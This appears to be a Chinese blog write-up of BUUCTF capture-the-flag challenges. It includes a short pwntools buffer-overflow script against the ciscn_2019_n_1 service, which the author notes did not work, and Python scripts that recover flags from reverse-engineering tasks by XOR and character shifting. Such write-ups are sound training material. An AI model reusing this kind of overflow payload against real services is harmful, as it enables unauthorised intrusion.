1.BUUCTF

ciscn_2019_n_1

檢查程序的保護(hù)機(jī)制。

1-1

IDA中查到關(guān)鍵代碼塊為func函數(shù)。

1-2

//python3
from pwn import *
ctf=remote('node4.buuoj.cn',28098)#建立連接
payload='a'*44 + p64(0x41348000).decode('unicode_escape')
flag=str.encode(payload)
ctf.sendline(flag)
ctf.interactive()

這里跑不出flag，看了wp也沒找出程序有啥問題。

reverse2

放進(jìn)IDA，找到關(guān)鍵代碼塊。

1-3

把i和r換為1。
shift+F12找到疑似flag。

1-4

內(nèi)涵的軟件

先用exeinfo查看一下程序的基本信息。

1-5

32位的文件，使用IDA PRO(32-bit)打開文件,flag就在眼前了。

1-6

新年快樂

1-7

32位，有殼，UPX壓縮殼,使用upx直接脫殼即可。
然后在ida中查看，得到flag。

1-8

xor

1-9

要求輸入一個(gè)長度為33的字符串，然后進(jìn)行操作：
b[1]=b[1]^b[0],
b[2]=b[2]^b[1],
...
b[32]=b[32]^b[31]
然后和global比較前33位字符，要求相同。接下來要找到global的值。

1-10

再次雙擊進(jìn)去。

1-11

//python3
global_list=['f',0xA,'k',0xC,'w','&','O','.','@',0x11,'x',0xD,'Z',';','U',0x11,'p',0x19,'F',0x1F,'v','"','M','#','D',0xE,'g',6,'h',0xF,'G','2','O']
flag='f'
for i in range(1,33):
    if(isinstance(global_list[i],int)):
        global_list[i]=chr(global_list[i])
    flag+=chr(ord(global_list[i-1])^ord(global_list[i]))
print(flag)

helloword

使用JEB反編譯apk文件，直接查找即可。

1-12

reverse3

32位文件，無殼。
關(guān)鍵代碼塊：

1-13

代碼邏輯很清晰，把輸入的串通過sub_4110BE函數(shù)，再過一個(gè)for循環(huán)，然后跟str2("e3nifIH9b_C@n@dH")比較。
查看sub_4110BE函數(shù)，發(fā)現(xiàn)一個(gè)叫aAbcdefghijklmn的變量，查看。

1-14

//python3
s='e3nifIH9b_C@n@dH'
s_list=list(s)
for i in range(0,16):
    s_list[i]=chr(ord(s_list[i])-i)
s=''.join(s_list)
print(s)